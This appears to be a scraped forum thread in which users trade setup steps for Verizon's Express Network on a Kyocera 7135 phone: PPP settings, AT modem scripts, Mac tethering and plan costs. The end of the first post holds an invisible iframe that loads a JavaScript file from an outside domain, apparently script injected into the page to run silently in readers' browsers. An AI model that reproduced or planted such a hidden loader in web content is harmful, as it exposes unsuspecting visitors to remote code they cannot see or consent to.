+ Reply to Thread
Page 1 of 4 1 2 3 4 LastLast
    LVC

Verizon Express Network Setup

Just switched my account to Express Network and the Kyo 7135 rocks (works with MAC OS X as well)

Setup
    On Kyo
    1) Go to PDA preferences
    2) Go to netwotk
    3) Select 1x high spped data
    4) enter username (typically your cell phone plus @vzw3g.com
    5) enter your password
    6) Connection (wireless modem)
    Phone: #777

Click on detail button
    1) Connection Type: PPP
    2) Idle Timeout: Never
    3) Query DNS: Checked
    4) IP Address: Checked automatic

Click on script

Send: at$qcmdr=3
    send cr
    send: at$qcqnc=0
    send cr:
    End

Hit ok
    You are ready to rock

On your Mac (assuming you have data cable)
    select Kyocera High speed modem (file is available at FAQ'S section)
    enter username, password and #777 same as Kyo
    and you are all set.
    I tried and it works great!!!!!

A word about email
    Set you outgoing SMTP to:
    mail.airbridge.net

this will allow you to send mail under your current POP address.

enjoy<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

One correction:

4) enter username (typically your cell phone plus @vzw@3g.com

Is there anyway to get the express network for free?

LVC
    Originally posted by rguibara
    Is there anyway to get the express network for free?
    You can change over your current plan to network Express. Essentially what you do is give up night and weekend free minutes. I changed over my regualr voice account to Express network---so you still basically use up voice minutes...So the account functions as both voice (no roam 50 states) and high speed data. With respect to my account the $$ was a wash

Verizon has changed the suggested script:

Send CR:
    Send: at$qnqnc=0
    Send CR:
    End:

Originally posted by ogakor

Send CR:
    Send CR:
    End:
    did they say why they have changed the setting from the original ?? I have not tried your above suggestion but I will tonight. I was just curious if they just use different scripts depending on the area you are in or the people you talk to...

LVC
    Originally posted by babacksh
    did they say why they have changed the setting from the original ?? I have not tried your above suggestion but I will tonight. I was just curious if they just use different scripts depending on the area you are in or the people you talk to...
    When I talked to them they were very specific about the second line of script set to =1 not Zero.

I have been using at$qcqnc=1 without a hitch---this is for the Express Network

at$qcqnc is for CSD. 1 is on, 0 is off. If set to 1, you are using CSD (QNC) data limiting yourself to 14.4

at$qcmdr is the medium data rate. Which I believe defines the data rate. 1=19.2k, 2=115.2k, 3=230.4k.

All these are doing is setting the modem up for the data call.

1xRTT (Express Netwok) scripts should always be:

send cr
    send: at$qcqnc=0
    send cr:
    End

QNC should be:

Send: at$qcmdr=2
    send cr
    send: at$qcqnc=1
    send cr:
    End

I don't know what changing "Send: at$qcqnc=0" to "Send: at$qnqnc=0" is supposed to fix (and I didn't notice any difference) but that's the specific change propagated through Verizon Express Network tech support today. I triple-checked. However, it does sound like a work in progress.

Originally posted by babacksh
    did they say why they have changed the setting from the original? I was just curious if they just use different scripts depending on the area you are in or the people you talk to.
    No specific reason given for the change, but there is supposed to be a glitch in some phones not being able to take full advantage of the high speed network. It sounds like Kyocera and Verizon either have worked it out or are very close to doing so. As far as I can tell, it does not depend on the calling area.

Perhaps this is why some people didn't notice much of a difference over the regular QNC connection? :dunno

Originally posted by Rambler
    Perhaps this is why some people didn't notice much of a difference over the regular QNC connection? :dunno
    I think that could be correct. I am trying the new script now, and without a speed test, it is hard to tell if it is significantl;y faster then the old script, but it is MUCH faster then QNC, and since I didn't notice much of a difference between the two before, I suspect it is due to the script.

I particularly notice it on PalmVNC. The screen refreshes VERY fast.

Alan

Originally posted by ogakor

Send CR:
    Send CR:
    End:

Originally posted by LVC
    You can change over your current plan to network Express. Essentially what you do is give up night and weekend free minutes. I changed over my regualr voice account to Express network---so you still basically use up voice minutes...So the account functions as both voice (no roam 50 states) and high speed data. With respect to my account the $$ was a wash
    so like right now, I'm having the 3300 minutes plan from last year. If I ask them to change over to network express, I can surf 300 minutes weekday daytime and 3000 minutes night and weekends? I don't have unlimited when I signed up yesterday. Or will I lose the 3000 minutes and only have 300 for the month for my current price?

yap that what they give me too.
    now I havethe EN unlimited for $99 so i don't have to think about
    running out of time.plus America one rate 600 for aditional $75
    all in the same phone.so I have my free week end.also they set me up with airbridge e-mail for free.forward the e-mail to my phone massage so i have a tone signal that i have e-mail comming in.I needed it because the 160 caracters e-mail is to short for me.it's work great.the only problem is that is too much money.

The at$qnqnc=0 has to be a typo, that is not a valid AT command for the 7135 or anything using the IS-707 data standard.

at$qcqnc=0 is correct for turning off CSD, and allowing for packet data.

As an FYI qcqnc means QUALCOMM Quick Net Connection

Folks,

While testing with my laptop tonight at home in a Boston suberb, I got reliably 110K down and 80K up against internet testers in Denver and Dallas.

I am using the default modem software supplied with the phone. You can't really set anything here (but the installed modem driver might).

You can see the difference with some Palm apps. For example, Avant Go can refresh all your sub scribed web pages in about 2 minutes of EN and it takes much longer using QNC.

Glenn

Originally posted by Atilla
    yap that what they give me too.
    now I havethe EN unlimited for $99 so i don't have to think about
    running out of time.plus America one rate 600 for aditional $75
    all in the same phone.so I have my free week end.also they set me up with airbridge e-mail for free.forward the e-mail to my phone massage so i have a tone signal that i have e-mail comming in.I needed it because the 160 caracters e-mail is to short for me.it's work great.the only problem is that is too much money.
    FYI, I have the Friends and family plan that has free nights and weekends and I paid $30 more on my current plan to activate EN and it goes against my minutes. And it holds true to the nights and wekends as free. So during the week days the EN usage goes against my plan minutes and the nights and weekends it is free.

Enjoy.

Originally posted by HoTSynC
    The at$qnqnc=0 has to be a typo
    Thanks for the info. I'll check with tech support again tomorrow and get someone to run it back up the line.

[i]QNC should be:

Send: at$qcmdr=2
    send cr
    send: at$qcqnc=1
    send cr:
    End [/B]
    When I first set up the phone I selected Verizon (not QNC) under "service" and my first line read at$qcmdr=2 (I am not using EN), however, I switched "service" to QNC and my first line on the QNC setting now reads at$qcmdr=3. Do you know what the difference is between choosing Verizon vs QNC as the service? Also, do you know the difference between a "3" setting and a "2" setting on first line (both seem to work fine)? I'm not having any problems connecting, I was just wondering.